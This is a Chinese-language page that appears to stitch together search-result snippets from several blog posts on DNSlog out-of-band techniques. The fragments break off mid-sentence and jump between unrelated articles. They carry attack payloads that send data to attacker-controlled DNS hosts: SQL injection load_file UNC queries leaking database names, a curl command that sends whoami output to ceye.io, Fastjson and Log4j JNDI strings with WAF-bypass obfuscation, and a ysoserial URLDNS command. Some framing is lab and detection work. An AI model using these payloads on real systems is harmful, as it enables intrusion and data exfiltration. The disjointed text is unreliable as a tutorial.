公共dnslog平台 ceye.io dnslog.cn burpcollaborator.net https://log.咕.com/ 搭建dnslog平台 Github:https://github.com.../lanyi1998/DNSlog-GO 例: b.com a.com b.com只需添加两个a记录 修改a.com的ns记录为 ns1.b.com ns2.b.com 修改config.ini配置
DNSlog就是存储在DNS Server上的域名信息,它记录着用户对域名leishianquan.com等的访问信息,类似日志文件....,我将 它的a记录泛解析到139.x.x.x上,这样就实现了无论我记录值填什么他都有解析,并且都指向139.x.x.x,当我向dns服务器发起test.luomiweixiong.com的解析请求时,DNSlog...二、自定义一个dns host 三、项目部署 https://github.com/lanyi1998/DNSlog-GO 1、该项目是由GO语言编写的,所以部署的时候需要用到GO语言的环境. 2...我这里前端采用的是8000端口,也记得要放行) 四、启动 访问出现需要输入Token就需要填入上面配置文件config.ini中的Token "luomweixiong" 五、环境验证 六、搭建成功...二、尽量使用自己搭建dnslog,避免信息泄漏,或者被别人捕获信息.
Mssql_Dnslog外带 原理 DNSLOG解释 DNS: 域名解析IP , 用户在浏览器输入一个域名, 靠DNS服务解析域名的真实IP, 访问服务器上相应的服务 DNSLOG: DNS的日志,...存储在DNS 服务器上的域名信息, 记录着用户对域名的访问信息,类似日志文件 DNSLOG利用原理 DNSLOG 是解析日志, DNS分为三级域名, 域名不区分大小写, 所以利用解析的日志把攻击者需要的值带出..., 称为数据外带, 原理上只要能进行DNS请求的函数都可能存在DNSlog注入 DNSLOG利用场景 sql注入时, 存在盲注或者延时, 我们获得需要数据就会频繁请求, 最后导致IP 被Ban sql注入时...可以外带数据,那么http是否也可以 原理 dnslog 是因为攻击者执行了命令 让存在sql的目标机访问了攻击者定义好的dnslog, 那么同样的, 可以通过命令, 让存在sql注入的目标机访问 攻击者定义好的...(concat(0x5C5C5C5C, mid(hex((*************)),1,60), 0x2E646E736C6F672E646F6D61696E2E636F6D))--a 搭建mysql
,然后某一天新的技术就产生了,也就是DNSlog注入。...具体原理如下: 首先需要有一个可以配置的域名,比如:dnslog.cn,然后通过代理商设置域名 dnslog.cn 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server...,这样以来所有 dnslog.cn 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请求了,图示如下: ?...0x02 DNSLOG XSS 虽然dnslog很方便,但是随之而来的问题也来了,部分dnslog平台并未对传回的dns日志内容进行过滤或者限制,但是在一般的情况下,域名只支持数字以及字母,是不支持传输特殊字符的...已经和dnslog.cn的站长师傅沟通确认过,并修复了漏洞,以上内容如有误望请各位师傅斧正,如需转载请注明原著。
因此,针对无回显漏洞,我们可以通过使用DNSLog来进行回显,DNSLog是一种回显机制,攻击者可以通过DNS的解析日志来读取漏洞执行的回显结果。...DNSLog的使用方法 1.DNSLog原理DNS的解析是递归与迭代相结合的,这里举个例子,当我们访问网站的时候,DNS的解析过程示意图。......我们只需要搭建一个DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级域名或者三级域名或者其他子域名上去请求,就可以通过DNS解析日志来获取到它们。...在线的DNSLog平台: http://ceye.io http://www.dnslog.cn 网站总是进不去,麻了。 为什么DNSlog注入只能用于windows系统?...DNSLog平台收到的DNS查询: 3830988536.png 无回显的XSS payload: DNSLog平台收到的DNS查询
我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级域名甚至三级域名上去请求,就可以通过DNS解析日志来获取它们。...2.DNSLog工具 如果有自己的服务器和域名,可以自己搭建一个这样的平台,直接使用BugScan团队开源的工具搭建即可。...项目地址:https://github.com/BugScanTeam/DNSLog 另外也可以使用在线平台,这里有很多,就拿出来细说了。...完美快速的将数据取出,如遇到MySQL盲注时,可以利用内置函数load_file()来完成DNSLog。...由于DNS预解析可以绕过CSP进行解析,结合DNSLOG,我们即可窃取在CSP保护下的Cookie。
以BWAPP为例,测试XXE漏洞,用DNSLOG作回显。 一、选择XXE漏洞测试,抓包,点击【anybugs?】。...二、获取域名 三、直接上payload 四、查看DNSLOG回显 如有错误,请及时指正!
Dnslog与Http外带 Mssql_Dnslog外带 原理 DNSLOG解释 DNS: 域名解析IP , 用户在浏览器输入一个域名, 靠DNS服务解析域名的真实IP, 访问服务器上相应的服务 DNSLOG...: DNS的日志, 存储在DNS 服务器上的域名信息, 记录着用户对域名的访问信息,类似日志文件 DNSLOG利用原理 DNSLOG 是解析日志, DNS分为三级域名, 域名不区分大小写, 所以利用解析的日志把攻击者需要的值带出..., 称为数据外带,原理上只要能进行DNS请求的函数都可能存在DNSlog注入 DNSLOG利用场景 sql注入时, 存在盲注或者延时, 我们获得需要数据就会频繁请求, 最后导致IP 被Ban sql注入时...可以外带数据,那么http是否也可以 原理 dnslog 是因为攻击者执行了命令 让存在sql的目标机访问了攻击者定义好的dnslog, 那么同样的, 可以通过命令, 让存在sql注入的目标机访问 攻击者定义好的...(concat(0x5C5C5C5C, mid(hex((*************)),1,60), 0x2E646E736C6F672E646F6D61696E2E636F6D))--a 搭建mysql
DNSLog外带注入和DNSlog带外注入?(OOB) 其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口 为什么需要外带注入?...这里主讲DNSlog外带注入 mysql-DNSlog外带注入: 利用条件: 1. mysql.ini 中 secure_file_priv 必须为空。 ( ps....参考文章:https://www.lifewire.com/unc-universal-naming-convention-818230 接受DNS请求的DNSlog平台: http://www.dnslog.cn...http://ceye.io 也可以自己手动搭建,工具地址:https://github.com/bugscanteam/dnslog/ 本地环境复现: 在ceye.io申请一个账号 ?...这里的\\\\转义之后为\\ 查询的数据如果有特殊符号可以进行编码,如hex() unc有长度限制,长度不能超过128 oracle-DNSlog
另外打开一个新的页面,进入dnslog.cn 点击Get SubDomain,得到一个随机分配的子域名。 (每次点击都会重新生成一个随机的子域名,所以避免误点) ?...id=1' and load_file(concat("\\\\",database(),".uifm3e.dnslog.cn\\xxx.txt"))--+ "\\\\" 四个\不能少 注意.uifm3e.dnslog.cn...然后在dnslog.cn里面点击Refresh Record,库名信息就会出现了 ? 表名 http://172.16.11.54/sqli-labs/Less-8/?...查找列名等其他信息的payload可以参考前面几关,就不在这里多说了 ………………………… 要注意,在dnslog.cn上只适合联系靶场,你所查找的信息该网站肯定会有记录的。...不过可以自己搭一个DNSlog平台 https://github.com/bugscanteam/dnslog/
测试Fastjson版本号:1.2.15 直接发送用burpsuite发送payload,将dataSourceName改成dnslog获取到的域名。 ... "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"ldap://6v0jfv.dnslog.cn...若刷新DNSlog有记录增加,那说明漏洞存在,反之,则不存在。 ? 如有错误,请及时指正,谢谢!
0x03 影响版本 Apache OFBiz < 17.12.06 0x04 环境搭建 环境搭建采用docker搭建,比较方便 docker run -d -p 811:8080 -p 8443:...8443 opensourceknight/ofbiz 网址 https://your_ip:8443 能正常访问即说明环境搭建成功 ?...java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://nu2xus.dnslog.cn > payload.txt 2、通过python脚本将...' opt = OptionParser(hstr) opt.add_option('-d','--dnslog',type='string',action="store",dest='dnslog...') (opts,args) = opt.parse_args() global dnslog global url dnslog = opts.dnslog url = opts.url
需要目标机器时windows系统 DnsLog盲注 DnsLog盲注原理 Dnslog平台:http://ceye.io/ http://ceye.io/profile curl mzq83x.ceye.io...curl `whoami`.mzq83x.ceye.io DnsLog盲注方法 核心语法: SELECT LOAD_FILE(CONCAT('\\\\',(select database(
使用nginx反向代理实现dnslog平台通过域名访问,并为该域名添加ssl证书,提升自行搭建dnslog平台的安全性。...前置信息:1、dnslog平台部署在8000端口,dnslog平台项目地址:https://github.com/lanyi1998/DNSlog-GO2、通过bash命令安装并启动nginx,默认没有...; error_log /var/log/nginx/dnslog_error.log;}启用站点配置sudo ln -s /etc/nginx/sites-available/--your_domain...www.your_domain--自动续订SSL证书sudo crontab -e添加以下行以每天检查并自动续订0 3 * * * certbot renew --quiet完成以上所有操作后,可为自行搭建的...dnslog平台添加域名和证书。
漏洞检测 DNSLog回显 通过构造DNS解析来判断是否是Fastjson,Fastjson在解析下面这些Payload时会取解析val的值,从而可以在dnslog接收到回显,以此判断是不是Fastjson...":"xxx.dnslog.cn"} {"@type":"java.net.Inet6Address","val":"xxx.dnslog.cn"} {"@type":"java.net.InetSocketAddress...","val":"xxx.dnslog.cn"}] Set[{"@type":"java.net.URL","val":"xxx.dnslog.cn"} {{"@type":"java.net.URL"...1.2.24 反序列化导致任意命令执行漏洞 这里使用Vulhub/Fastjson-1.2.24-1.2.24-rce/进行搭建 抓包,修改一下然后提交,可以在DNSLog平台看到回显 // Payload...搭建:Vulhub/Fastjson-1.2.24-1.2.47-rce/ 抓包,POST以下Payload。
/poc} waf绕过 ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://xxx.dnslog.cn/poc} ${${::-j}ndi:rmi...://xxx.dnslog.cn/poc} ${jndi:rmi://xxx.dnslog.cn/poc} ${${lower:jndi}:${lower:rmi}://xxx.dnslog.cn/poc...:rmi}://xxx.dnslog.cn/poc} RCE利用 靶机:http://192.168.223.129:8080/ 靶机搭建: 1.平台环境 http://vulfocus.fofa.so.../ 2.本地搭建 docker pull vulfocus/log4j2-rce-2021-12-09:latest docker run -d -p 8080:8080 vulfocus/log4j2...-rce-2021-12-09:latest 复现过程 先用dnslog测试一下 1.构造一个LDAP或者RMI服务器。
0x00 介绍 目前的Log4j2检测都需要借助dnslog平台,是否存在不借助dnslog的检测方式呢 也许在甲方内网自查等情景下有很好的效果 笔者实习期间参与过xray的一些开发,对其中的反连平台有一些了解...后来木头师傅又做了Burpsuite插件的适配(由于一些原因木头师傅删除了这些功能) 0x01 LDAP 无论是LDAP还是RMI协议情况下的漏洞触发,总是需要发请求的,于是我们将这些请求抓包分析 搭建正常的
针对此类问题我们可以使用DNSLOG来进行突破。...DNSlogFuzz渗透中的使用 描述:DNSLOG是一种回显机制,使用者可以通过DNS解析日志来读取漏洞的回显; 1.DNSLOG的原理 DNS的解析是递归与迭代相结合的,当我们访问一个根域的时候DNS...WeiyiGeek.参考Freebuf 我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。...比如: 在 http://www.dnslog.cn/ 中申请一个域名然后,在对其子域名进行ping操作就能看到回显; WeiyiGeek.DNSLOG回显 2.DNSlog服务器自己搭建 当然您也可以自建一个这样的平台直接使用...BugScan团队开源的工具搭建即可,前提是您需要有自己的服务器和域名, https://github.com/BugScanTeam/DNSLog 或者使用在线平台: http://www.dnslog.cn
则可以不用设置其他dnslog 0x03 如果默认dnslog访问不了,那么就需要去配置ceye.io,记得将isceye设置为true,然后填上token、ceye.io的地址,保存配置 0x04 如果需要内网...dnslog,那么将isceye设置为false, 将内网dnslog填入privatednslogurl,内网dnslog查看的地址填入privatednsResponseurl,保存配置 2-自定义...(Dashborad模块内开启) 0x04 可以点击按钮test dnslog delay测试当前环境,如果没有配置ceye和自定义dnslog的话,会使用默认dnslog,但是默认dnslog有时会加载不出来...配图教程 0x01设置域名类型dnslog平台 根据默认dnslog平台,github: DNSLog-Platform-Golang 0x001 获取dnslog与token 首先访问搭建好的dnslog...恢复默认参数 0x11 Test dnslog delay 测试与dnslog的延迟 0x12 use[{::-.}]replace.
(来自奇安信CERT) 0x02 影响范围 ---- Jira < 8.4.0 0x03 环境搭建 ---- 在线靶场 开放时间(当前-9月29日20:00) 获取方式(完成任意一个): 1、将本文转发至朋友圈并配文字...,截图发至公众号内 2、联系作者,五元红包 自行搭建 使用docker进行搭建,执行以下命令开启环境 docker pull cptactionhank/atlassian-jira:7.8.0...url=http://192.168.198.133:8080@bgkwd5.dnslog.cn HTTP/1.1 Host: 192.168.198.133:8080 User-Agent: Mozilla...192.168.198.133:8080/secure/Dashboard.jspa X-Atlassian-Token: no-check Content-Length: 2 其中ip替换为目标ip,共三处 @后面改为你的dnslog...去dnslog中刷新查看结果,可以看到有流量经过 ? 如果访问未开放端口,结果是这样的: ?
领取专属 10元无门槛券
手把手带您无忧上云